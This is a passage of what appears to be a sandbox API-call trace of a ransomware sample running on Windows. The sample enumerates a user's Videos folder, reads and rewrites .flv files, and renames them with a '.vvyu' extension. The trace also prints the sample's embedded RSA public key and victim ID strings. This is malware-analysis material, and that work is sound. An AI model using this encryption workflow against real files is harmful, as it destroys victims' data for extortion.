(in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0187.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397a8 [0187.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0187.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39838 [0187.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0187.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39808 [0187.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397f0 [0187.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0187.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39850 [0187.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397f0 | out: hHeap=0x6a0000) returned 1 [0187.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d397f0 [0187.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39808 | out: hHeap=0x6a0000) returned 1 [0187.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0187.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0187.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0187.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0187.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0187.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397c0 | out: hHeap=0x6a0000) returned 1 [0187.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d397c0 [0187.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0187.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0187.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39820 | out: hHeap=0x6a0000) returned 1 [0187.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0187.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39850 | out: hHeap=0x6a0000) returned 1 [0187.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0187.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x74ad40 [0187.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0187.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0187.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397c0 | out: hHeap=0x6a0000) returned 1 [0187.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0187.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0187.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0187.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0187.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0187.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0187.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0187.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0187.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0187.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0187.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397f0 | out: hHeap=0x6a0000) returned 1 [0187.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39838 | out: hHeap=0x6a0000) returned 1 [0187.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0187.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397d8 | out: hHeap=0x6a0000) returned 1 [0187.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397a8 | out: hHeap=0x6a0000) returned 1 [0187.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0187.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0187.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0187.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39790 | out: hHeap=0x6a0000) returned 1 [0187.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38dd8 | out: hHeap=0x6a0000) returned 1 [0187.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0187.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0187.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0187.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0187.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0187.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0187.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0187.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0187.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0187.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0187.878] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0xf831, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0xf831, lpOverlapped=0x0) returned 1 [0187.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0187.880] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xf836, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.880] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0187.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0187.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0187.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0187.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0187.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0187.881] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0187.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0187.881] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0187.881] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0187.881] CloseHandle (hObject=0x584) returned 1 [0187.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0187.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d42908 [0187.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0187.884] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\7oqi8LaYkzM3PzQg.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\7oqi8laykzm3pzqg.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\7oqi8LaYkzM3PzQg.flv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\7oqi8laykzm3pzqg.flv.vvyu")) returned 1 [0187.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.885] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0187.888] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798ad850, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798ad850, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7e35a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0187.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38dd8 [0187.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5e) returned 0x2c6fdf8 [0187.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38dd8 | out: hHeap=0x6a0000) returned 1 [0187.889] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\desktop.ini") returned=".ini" [0187.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0187.889] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd33180, ftCreationTime.dwHighDateTime=0x1d8a4da, ftLastAccessTime.dwLowDateTime=0xc9055630, ftLastAccessTime.dwHighDateTime=0x1d8a634, ftLastWriteTime.dwLowDateTime=0xc9055630, ftLastWriteTime.dwHighDateTime=0x1d8a634, nFileSizeHigh=0x0, nFileSizeLow=0x7cb0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HDnGwo1W3X7Qq9.flv", cAlternateFileName="HDNGWO~1.FLV")) returned 1 [0187.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38dd8 [0187.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0187.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38dd8 | out: hHeap=0x6a0000) returned 1 [0187.890] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\HDnGwo1W3X7Qq9.flv") returned=".flv" [0187.890] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\HDnGwo1W3X7Qq9.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\hdngwo1w3x7qq9.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0187.891] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=31920) returned 1 [0187.891] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0187.893] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x7c8a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.893] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0187.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.896] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.896] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x7cb0, lpOverlapped=0x0) returned 1 [0187.897] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0187.897] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.897] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.897] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0187.899] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0187.899] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0187.899] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0187.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0187.899] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0187.899] GetLastError () returned 0x0 [0187.899] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0187.899] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0187.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0187.899] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0187.899] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0187.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.899] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0187.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7cb0) returned 0x2d43778 [0187.900] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0187.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0187.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0187.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0187.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38dd8 [0187.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39790 [0187.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38e20 [0187.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397a8 [0187.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397d8 [0187.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39838 [0187.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397f0 [0187.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0187.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0187.901] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0187.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0187.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397d8 | out: hHeap=0x6a0000) returned 1 [0187.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397f0 | out: hHeap=0x6a0000) returned 1 [0187.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39838 | out: hHeap=0x6a0000) returned 1 [0187.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0187.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39838 [0187.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0187.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d397f0 [0187.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0187.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d397d8 [0187.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0187.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0187.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0187.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0187.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0187.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0187.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0187.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0187.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397f0 | out: hHeap=0x6a0000) returned 1 [0187.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397d8 | out: hHeap=0x6a0000) returned 1 [0187.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0187.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0187.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39838 | out: hHeap=0x6a0000) returned 1 [0187.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0187.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0187.904] GetCurrentThreadId () returned 0x264 [0187.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0187.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d37fd8 [0187.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0187.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0187.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0187.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0187.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0187.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0187.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.905] GetCurrentThreadId () returned 0x264 [0187.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.905] RtlAllocateHeap (HeapHandle=0x6a0000, 